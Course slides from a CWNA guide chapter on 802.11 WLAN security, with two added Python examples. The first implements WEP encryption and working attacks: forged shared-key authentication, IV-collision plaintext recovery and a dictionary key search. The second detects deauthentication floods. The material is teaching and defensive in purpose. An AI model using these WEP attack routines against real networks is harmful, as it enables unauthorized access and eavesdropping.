CWNA Guide to Wireless LANs, Second Edition
Chapter Eight
Wireless LAN Security and Vulnerabilities
• Define information security
• Explain the basic security protections for IEEE 802.11 WLANs
• List the vulnerabilities of the IEEE 802.11 standard
• Describe the types of wireless attacks that can be launched against a wireless network
Security Principles: What is Information Security?
• Information security: The task of guarding digital information
– Ensures that protective measures are properly implemented
– Protects the confidentiality, integrity, and availability (CIA) of information on the devices that store, manipulate, and transmit it, through products, people, and procedures
Security Principles: What is Information Security? (continued)
Security Principles: Challenges of
– Faster detection of weaknesses
• Zero-day attacks: a weakness is exploited before the vendor has released a fix
– Distributed attacks
• The “many against one” approach
• Cannot be stopped by identifying and blocking a single source
Security Principles: Categories of Attackers
Table 8-1: Attacker profiles
Security Principles: Security Organizations
• Many security organizations exist to provide security information, assistance, and training
– Computer Emergency Response Team Coordination Center (CERT/CC)
– Forum of Incident Response and Security Teams (FIRST)
– InfraGard
– Information Systems Security Association (ISSA)
– National Security Institute (NSI)
– SysAdmin, Audit, Network, Security (SANS) Institute
Basic IEEE 802.11 Security
Access Control
• Intended to guard the availability of information
• Wireless access control: Limits which devices are admitted to the AP
– Filtering
• Media Access Control (MAC) address filtering: Admits or rejects a node based on its MAC address, which is assumed to be unique to that node
Access Control (continued)
Figure 8-4: MAC address filtering
Access Control (continued)
• MAC address filtering is considered a basic means of controlling access
– Every permitted address must be pre-approved and entered on the AP
– Difficult to provide temporary access for “guest” devices
Wired Equivalent Privacy (WEP)
• Guards the confidentiality of information
– Ensures that only authorized parties can view it
• Used in IEEE 802.11 to encrypt wireless transmissions
– “Scrambles” the data so that an eavesdropper sees only ciphertext
WEP: Cryptography
• Cryptography: The science of transforming information so that it remains secure while being transmitted or stored
– “Scrambles” data
• Encryption: Transforming plaintext to ciphertext
• Decryption: Transforming ciphertext to plaintext
• Cipher: An encryption algorithm
– Given a key that is used to encrypt and decrypt messages
– Weak keys: Keys that are easily discovered (for example, short or guessable keys)
WEP: Cryptography (continued)
Figure 8-5: Cryptography
WEP: Implementation
– The same key is installed on the wireless device and on the AP
– Private key cryptography, also called symmetric encryption
WEP: Implementation (continued)
Figure 8-6: Symmetric encryption
WEP: Implementation (continued)
• WEP shared secret keys must be at least 40 bits
– Most vendors use 104 bits
– Because the 24-bit IV is prepended to the key before RC4 is seeded, these are marketed as “64-bit” and “128-bit” WEP
• Options for creating WEP keys:
– 40-bit WEP shared secret key (5 ASCII characters or 10 hexadecimal digits)
– 104-bit WEP shared secret key (13 ASCII characters or 26 hexadecimal digits)
– Passphrase (16 ASCII characters), from which the vendor’s software derives the key
• APs and wireless devices can store up to four shared secret keys
– The default (transmit) key is used to encrypt every frame the device sends; the 2-bit key ID carried next to the IV tells the receiver which of the four keys to use
WEP: Implementation (continued)
Figure 8-8: Default WEP keys
Figure 8-9: WEP encryption process
WEP: Implementation (continued)
• When an encrypted frame arrives at the destination:
– The receiving device separates the 24-bit IV from the ciphertext
– Combines the IV with the appropriate secret key (chosen by the key ID) to create a keystream
– XORs the keystream with the ciphertext to recover the plaintext and the 32-bit Integrity Check Value (ICV)
– Runs the plaintext through CRC-32 and compares the result with the ICV
• If they match, the frame is accepted as intact; otherwise it is discarded
• The keystream is produced by a pseudo-random number generator (PRNG), which in WEP is the RC4 cipher seeded with IV || secret key
– RC4 is a stream cipher
– Caveat: CRC-32 is a linear checksum, so the ICV catches transmission errors but not deliberate modification of the ciphertext
WEP: Implementation (continued)
Figure 8-10: Stream cipher
Authentication
• IEEE 802.11 authentication: The process in which the AP accepts or rejects a wireless device
• Open system authentication:
– The wireless device sends an authentication request frame, which the AP accepts without any proof of identity
– The device then sends an association request frame carrying its supported data rates and the service set identifier (SSID)
– The AP compares the received SSID with the network SSID
• If they match, the wireless device is admitted to the network
Authentication (continued)
• Shared key authentication: Uses the WEP keys
– The AP sends the wireless device a 128-byte challenge text, in plaintext
– The wireless device encrypts the challenge text with its WEP key and returns it to the AP
– The AP decrypts the returned result and compares it with the original challenge text
• If they match, the device is accepted into the network
Vulnerabilities of IEEE 802.11 Security
• The IEEE 802.11 standard’s security mechanisms for wireless networks have fallen short of their goal
• Vulnerabilities exist in:
– Authentication
– Address filtering
– WEP
Open System Authentication Vulnerabilities
• Inherently weak
– Based only on a match of SSIDs
– The SSID is beaconed from the AP and collected during passive scanning
• Easy to discover
• Vulnerabilities:
– Beaconing the SSID is the default mode on all APs
– Not all APs allow beaconing to be turned off
• Or the manufacturer recommends against turning it off
– The SSID is transmitted in plaintext (unencrypted) in probe and association requests even when beaconing is off, so hiding it only delays discovery
Open System Authentication Vulnerabilities (continued)
Figure 8-12: Forcing the renegotiation process
Shared Secret Key Authentication Vulnerabilities
• Attackers can read the key from an approved wireless device (i.e., steal it) and then use it on their own wireless devices
• Brute force attack: The attacker tries every possible key until the correct one is found
• Dictionary attack: Takes each word from a dictionary and encodes it the same way the vendor encodes a passphrase into a key
– Each candidate key is tested against a captured encrypted frame; the key is right when the decrypted frame’s ICV verifies
Shared Secret Key Authentication Vulnerabilities (continued)
• The AP sends the challenge text in plaintext
– An attacker can capture the challenge text and the device’s response (the encrypted text and its IV)
• XORing the plaintext challenge with the ciphertext yields the RC4 keystream for that IV, without revealing the key
• Because WEP receivers do not reject a reused IV, the attacker can reuse that keystream to answer a later challenge and authenticate without ever knowing the key
Shared Secret Key Authentication Vulnerabilities (continued)
Table 8-2: Authentication attacks
Address Filtering Vulnerabilities
• Every frame carries its source MAC address in plaintext, and the address can be changed in software, so an attacker can copy an approved address and pass the filter
Table 8-3: MAC address attacks
WEP Vulnerabilities
• Uses 40- or 104-bit keys
– Shorter keys are easier to crack
• The WEP implementation violates a cardinal rule of cryptography: a stream-cipher keystream must never be reused
– The 24-bit IV space (about 16.7 million values) is exhausted in hours on a busy network, and many implementations restart the IV at zero or choose it at random
– APs and devices end up repeating IVs
• Collision: Two packets encrypted with the same IV, and therefore the same keystream
– XORing the two ciphertexts cancels the keystream and leaves the XOR of the two plaintexts; a known or guessable plaintext then recovers the keystream for that IV, which the attacker can use to decrypt or forge further frames
WEP Vulnerabilities (continued)
Figure 8-13: XOR operations
Figure 8-14: Capturing packets
WEP Vulnerabilities (continued)
• The PRNG does not create truly random numbers
– Pseudorandom: the keystream is completely determined by IV || key
– The first bytes of RC4 output are statistically biased by the key bytes; because the 3-byte IV is sent in plaintext and forms the start of the RC4 key, certain “weak” IVs leak information about the secret key bytes (the Fluhrer-Mantin-Shamir attack)
Table 8-4: WEP attacks
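The encryption and decryption process on the WEP implementation slides, the shared-key challenge exchange and its keystream leak, the IV-collision attack, and the dictionary attack all come down to a few lines of RC4 and XOR. The following is an added example written for this page, not code from the CWNA Guide or from any vendor's WEP implementation. The key, IVs, challenge bytes, frame contents and the tiny word list are constructed here; a real attacker would read them from captured frames, and a real vendor would derive a key from a passphrase with its own algorithm rather than by taking the raw ASCII bytes as this example does for 5-character keys.

```python
import struct
import zlib


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4 (KSA + PRGA); WEP seeds it with IV || secret key."""
    s = list(range(256))
    j = 0
    for i in range(256):                                # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    while len(out) < n:                                 # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def icv(data: bytes) -> bytes:
    """WEP Integrity Check Value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)

def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Frame body as sent on the air: IV(3) | key-ID byte | RC4(plaintext || ICV)."""
    if len(key) not in (5, 13) or len(iv) != 3:
        raise ValueError("WEP needs a 40- or 104-bit key and a 24-bit IV")
    ks = rc4_keystream(iv + key, len(plaintext) + 4)
    return iv + bytes([key_id << 6]) + xor(plaintext + icv(plaintext), ks)

def wep_decrypt(key: bytes, body: bytes):
    """Receiver: split off the IV, regenerate the keystream, check the ICV.
    Returns the plaintext, or None when the ICV fails (frame discarded)."""
    iv, data = body[:3], body[4:]
    pt_icv = xor(data, rc4_keystream(iv + key, len(data)))
    pt, tag = pt_icv[:-4], pt_icv[-4:]
    return pt if tag == icv(pt) else None

# (1) Shared-key authentication leaks keystream: the 128-byte challenge is sent in
#     clear and returned WEP-encrypted, so (challenge || ICV) XOR ciphertext = keystream.
def keystream_from_auth(challenge: bytes, response_body: bytes) -> bytes:
    return xor(challenge + icv(challenge), response_body[4:])

def forge_auth_response(iv: bytes, keystream: bytes, new_challenge: bytes) -> bytes:
    """Answer a later challenge with the leaked keystream; the receiver does not
    reject a reused IV, so the secret key is never needed."""
    return iv + b"\x00" + xor(new_challenge + icv(new_challenge), keystream)

# (2) IV collision: same IV => same keystream, so C1 XOR C2 = P1 XOR P2 and a known
#     P1 exposes P2.
def plaintext_from_collision(body1: bytes, known_pt1: bytes, body2: bytes) -> bytes:
    if body1[:3] != body2[:3]:
        raise ValueError("no collision: the IVs differ")
    n = min(len(body1), len(body2)) - 8                 # strip header and ICV
    return xor(xor(body1[4:4 + n], body2[4:4 + n]), known_pt1[:n])

# (3) Dictionary attack: turn each word into a key (here: raw ASCII bytes of a
#     5-character key, an assumption) and keep the one whose ICV verifies.
def dictionary_attack(body: bytes, candidates):
    for word in candidates:
        key = word.encode()
        if len(key) == 5 and wep_decrypt(key, body) is not None:
            return key
    return None

def demo() -> dict:
    key, iv = b"s3cr3t_key_13", b"\x01\x02\x03"         # constructed 104-bit key and IV
    frame = wep_encrypt(key, iv, b"GET /index.html HTTP/1.0\r\n")
    tampered = frame[:-1] + bytes([frame[-1] ^ 0x01])   # one ciphertext bit flipped
    challenge, later = bytes(range(128)), bytes(range(128, 256))   # constructed challenges
    ks = keystream_from_auth(challenge, wep_encrypt(key, iv, challenge))
    p1, p2 = b"known probe text for AP", b"secret password 1234567"
    weak = wep_encrypt(b"admin", iv, b"hello")          # frame from a badly keyed AP
    return {
        "roundtrip": wep_decrypt(key, frame),
        "tampered_rejected": wep_decrypt(key, tampered),
        "forged_auth_accepted": wep_decrypt(key, forge_auth_response(iv, ks, later)) == later,
        "collision_leak": plaintext_from_collision(wep_encrypt(key, iv, p1), p1, wep_encrypt(key, iv, p2)),
        "dictionary_hit": dictionary_attack(weak, ["guest", "admin", "12345"]),
    }

if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Three things are worth noticing when running it: the forged authentication response decrypts correctly under the real key although the attacker never learned that key; the collision leak works without RC4 at all, because it only needs two ciphertexts under the same IV; and the ICV check that rejects the tampered frame is the same check the dictionary attack abuses as a key oracle.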
Other Wireless Attacks: Man-in-the-Middle Attack
• Makes it appear that two computers are communicating directly with each other
– In fact both are sending and receiving data through a computer positioned between them
– Active (the attacker alters the traffic) or passive (the attacker only reads it)
Figure 8-15: Intercepting transmissions
Other Wireless Attacks: Man-in-the-Middle Attack (continued)
Figure 8-16: Wireless man-in-the-middle attack
Other Wireless Attacks: Denial of Service (DoS) Attack
• A standard DoS attack attempts to make a server or other network device unavailable by flooding it with requests
– The attacking computers are programmed to send requests but never complete the exchange
• Wireless DoS attacks are different:
– Jamming: RF interference prevents wireless devices from transmitting
– Forcing a device to continually disassociate and re-associate with the AP by sending forged deauthentication or disassociation frames; 802.11 management frames are neither authenticated nor encrypted, so a forged frame is indistinguishable from a real one
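Because a forged deauthentication frame looks exactly like a real one, the only practical way to detect the disassociation attack described above is by rate. The following added example (written for this page; not from the CWNA Guide or any wireless IDS product) parses 802.11 management-frame headers and flags any BSSID that emits more than a threshold of deauthentication or disassociation frames inside a sliding time window. The MAC addresses, timestamps, window length and threshold are constructed assumptions, and the frame builder exists only to produce the sample capture in memory; nothing is transmitted.

```python
import struct
from collections import defaultdict

DEAUTH, DISASSOC = 0x0C, 0x0A          # 802.11 management-frame subtypes


def build_mgmt_frame(subtype: int, dst: bytes, src: bytes, bssid: bytes,
                     seq: int, reason: int = 7) -> bytes:
    """802.11 management frame: Frame Control | Duration | A1 | A2 | A3 | Seq Ctrl | body.
    Used here only to construct sample captures. Reason 7 ("class 3 frame from a
    non-associated station") is the code most forged deauth floods carry."""
    fc = struct.pack("<H", subtype << 4)               # version 0, type 0 (mgmt), no flags
    hdr = fc + struct.pack("<H", 0) + dst + src + bssid + struct.pack("<H", seq << 4)
    return hdr + struct.pack("<H", reason)             # body: 2-byte reason code


def parse_mgmt_frame(frame: bytes):
    """Return (subtype, dst, src, bssid, reason) for a deauthentication or
    disassociation frame, or None for anything else."""
    if len(frame) < 26:
        return None
    fc, = struct.unpack_from("<H", frame, 0)
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0 or subtype not in (DEAUTH, DISASSOC):
        return None
    dst, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    reason, = struct.unpack_from("<H", frame, 24)
    return subtype, dst, src, bssid, reason


def detect_deauth_flood(capture, window_s: float = 1.0, threshold: int = 10):
    """capture: iterable of (timestamp_seconds, frame_bytes) in time order.
    Returns the set of (bssid, source) pairs that sent more than `threshold`
    deauth/disassoc frames within any `window_s` window. A spoofing attacker
    uses the AP's own address, so the alert names the BSSID under attack."""
    recent = defaultdict(list)
    alerts = set()
    for ts, frame in capture:
        parsed = parse_mgmt_frame(frame)
        if parsed is None:
            continue
        _, _, src, bssid, _ = parsed
        q = recent[(bssid, src)]
        q.append(ts)
        while q and ts - q[0] > window_s:              # slide the window
            q.pop(0)
        if len(q) > threshold:
            alerts.add((bssid.hex(":"), src.hex(":")))
    return alerts


def sample_capture():
    """Constructed capture: one legitimate deauth, then a forged broadcast flood
    that spoofs the AP's address, then an unrelated management frame."""
    ap, sta, bcast = bytes.fromhex("00112233aabb"), bytes.fromhex("001122334455"), b"\xff" * 6
    cap = [(0.0, build_mgmt_frame(DEAUTH, sta, ap, ap, 1, reason=3))]   # station leaving
    cap += [(5.0 + i * 0.0125, build_mgmt_frame(DEAUTH, bcast, ap, ap, 100 + i))
            for i in range(40)]                                          # 40 frames in 0.5 s
    cap.append((6.0, build_mgmt_frame(0x08, bcast, ap, ap, 200)))        # subtype 8: ignored
    return cap


if __name__ == "__main__":
    print(detect_deauth_flood(sample_capture()))
```

The detector deliberately does not try to tell a forged frame from a genuine one, because without 802.11w (protected management frames) that is impossible on the air; a single deauth from a station that is genuinely leaving stays below the threshold, while a flood aimed at the BSSID trips it within the first dozen frames.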
Summary
• Information security protects the confidentiality, integrity, and availability of information on the devices that store, manipulate, and transmit the information, through products, people, and procedures
• There are significant challenges in keeping wireless networks and devices secure
• Six categories of attackers: Hackers, crackers, script kiddies, computer spies, employees, and cyberterrorists
Summary (continued)
• Three categories of default wireless protection: access control, wired equivalent privacy (WEP), and authentication
• Significant security vulnerabilities exist in the IEEE 802.11 security mechanisms
• Man-in-the-middle attacks and denial of service (DoS) attacks can be used to attack wireless networks